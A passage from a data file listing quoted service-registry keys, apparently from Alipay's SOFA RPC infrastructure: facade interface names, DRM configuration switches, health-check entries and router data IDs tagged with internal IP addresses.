fQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:hyp-data-operate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.101.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcredittrans.facade.moonlight.api.MlctransTransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mvcdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iconnect.common.facade.api.DeliverySpaceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.threadMonitorEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.intimateprod.common.service.facade.api.liteuser.FamilyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:pcreditbfweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileiclib.common.service.facade.product.papers.PapersProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FinFundAppointmentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.ScriptConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.notify.RemedyNotifyGzoneService:1.0:remedyFinBatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mdeduct#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.admgr.common.service.facade.CreativeTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.company.api.CompanyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.accountNoSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.directUseH5Url,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.menu.MenuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.opinioncoreCacheName.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.GrayControlDrmResourceTrigger.paymentTokenModeByUidRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.domain.manage.facade.api.DomainInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.common.service.facade.role.api.OrgRoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.BrandQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_YEB_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.miniprod.common.service.facade.api.miniappkeep.MiniAppKeepPrizeTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.238.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.icif.service.facade.apiv2.DeveloperQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.198.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.settleprod.service.facade.creditexpress.CreditExpressConsultService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.ebpp.EbppgwErrorCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.dal.ldc.offlinepay.daointerface.RecordLogDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.ShopDynamicLayoutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.arcore.common.service.facade.z.api.ArAccountFacade:1.0:zArAccountFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:trsautct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.socialcore.facade.tag.BusinessTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.open.api.risk.collation.RiskCollationCollector:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.TradeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.circle.api.mrchfeature.MrchFeatureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.142.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:batchfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.doubleQueryOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.almcenter.service.facade.api.AlmNonBaseFactorDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chair.Mosn.EchoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.finpwm.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.ecm.common.service.facade.api.EmergencyBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkebankcore.common.service.appgw.service.AlipayGwProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulecenter.facade.common.RuleAnalyzeRouteService:1.0:CHECKRULE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.upgrade.sdk.common.facade.api.ModeUpgradeStepApi:1.0:dataphin-pipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.49.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-6264@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.itemcore.common.service.facade.v2.DisplayCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.icifTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frscenter.common.service.facade.api.ScenarioAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.integrationprod.common.service.facade.MigrationUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:peerpay@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttrade.common.service.facade.InstTradeWriteOffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.activity.CommercialActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.acbillingcore.common.service.facade.CreditManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.tradeexprod:name=com.alipay.common.session.sessionConfigDrm.dataSeparate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:compmng-compTaskCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.config.sequence.IdGenerateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:dragonx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.applicationOtpFacade.ApplicationOtpFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ecsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.reward.api.RewardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.rule.core.engine.config.RuleEngineResource.recordCondCost,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.89.157.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.aciamcore.common.service.facade.identity.GroupServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.schedulerWatchdogHostNames,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.goldetf.api.GoldtransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.chips.api.ChiptransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservemng.service.facade.api.ReservecenterQueryAccountBalanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iptcore_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.goldetf.api.GoldtransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.ShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.QrcodeRetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.64.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.developerops.facade.api.faq.FaqRepositoryManagerFacade:1.0:private@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frscenter.common.service.facade.api.ScenarioSubjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.common.service.facade.order.BizSequenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.support.isc.IscStabilityScoreStandardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilemock.common.service.facade.api.MgwConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.testmeshend.facade.ServiceOfObserveMode3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.echox.service.EchoxAopPlaybackService:1.0:ccrprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.multiprofit.MultiProfitQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aisoc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.195.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.aciamcore.common.service.facade.login.LoginConfigServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.lendpofprod.lendpofprod_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantClassificationQueryFacade:1.0:mifcz-merchantClassificationQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pamir.operator.PamOperatorQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.optlog.OperateLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.einvoice.prod.facade.service.EinvoiceTaxCodeRuleService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:infosec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.common.service.facade.FamilyAssetsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PSSLIP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmerchant.service.facade.PcreditQueryMemberListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.da.common.service.facade.api.AssetAssignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.fininfo:name=com.alipay.finnet.service.drm.ChannelFilterDRM.switchToAntcList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_172.21.104.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:pucprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.OrderCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_dchaincustomer_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.yfd.common.service.facade.ds.YfdDataSetConfigLoadServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.125.150#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.baoxiandataproc.common.service.api.DailyFileTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_ZIAN_TEST3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.yunfengdieweb:name=com.alipay.rdsguard.drm.RdsSystemSwitchDrmResource.timeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.riskmatrix.common.service.strategy.StrategyDependencyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_agreementfreezeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.common.astconfig.api.AstconfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ecsign@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.netEventPutOut,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.221.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:finriskeventseek@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:beyondtrustace@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.basementweb.SprintFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.v2.AutoTaobaoFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.LoanSceneOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecmng.asynchronous.push.MsgPushFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-laterkoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gray:name=com.alipay.grayprod.change.drm.ChangePolicy.versioningPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.common.AssetItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.LoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.ImportKaApplyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.stock.isDiscoveryDowngradeFeedsAutoFengdie,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.UcaMigrateOperateDrm.doForceRevise,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.zpaas.zappinfo.facade.query.AppBaselineConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.certifymng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cif.user.UserInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.45.70.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@finxbff#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.dingdingRobotUrlWithLinkHostUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.common.BumngGzTairRefreshFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.HotpatchMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.einvoice.prod.facade.service.EinvoiceTaxOfficeService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.232.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:aiceTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.friendship.RoleFriendshipViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BundleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.197.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.aip.FundFixedManageWrapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.loancore.common.service.facade.alipay.api.rzone.ZlcAccountRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SecuMainFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayu.facade.service.LegoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custinsight.common.service.facade.BenefitRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dmeta.facade.property.BusinessPropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.aftscv.common.service.facade.AftsCvDataGatherService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.ImmTrCheckFacade:1.0:bkcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.xcpt.MerchantDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.ModelConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securitycore.common.service.facade.risk.api.RiskAdvicePolicyService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:11@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:insriskdatasync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.custview.facade.CompositeViewQueryFacade:1.0:compositeViewQueryFacade-for-zhima@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tab.common.service.facade.JiuzhouIpayPreCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.securityops.common.service.client.api.SecOpsChangeServiceFacade:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cifin:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.tairHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthprod.facade.HealthInsCustomerServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.transport.TransportAtomManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.UserDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.common.service.facade.repay.api.OfflineRepayQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.common.service.facade.api.AdvertTriggerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.unitestcenter.QualityInfoQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.budget.api.BudgetLibPauseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.coc.ecomodel.api.merchant.MerchantQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmobile.servie.facade.api.SceneConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.kyc.VerificationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.content.ContentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PAYCORECHGTYPE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kgengine.core.service.concept.ConceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.assets.api.facade.service.LineageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.AntVip-JavaClient:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_SECUDOWNLOAD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omgpromotion.api.PromoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:spcenterAntProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-JavaClient:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.57.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.libracore.common.service.facade.api.ResourceLimitDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.DeltaHgIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instriskcenter.facade.api.InstIndustryInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.28.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_T_ABCDEFG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:marlinconsoleadaptor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.AllocateOrderUniqueCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.NfcUserCardModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-PCLOANAMOUNTPROD-SERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.242.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instpay.settleprod.service.facade.gcard.GCardGrantSetupService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ccmpower@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA"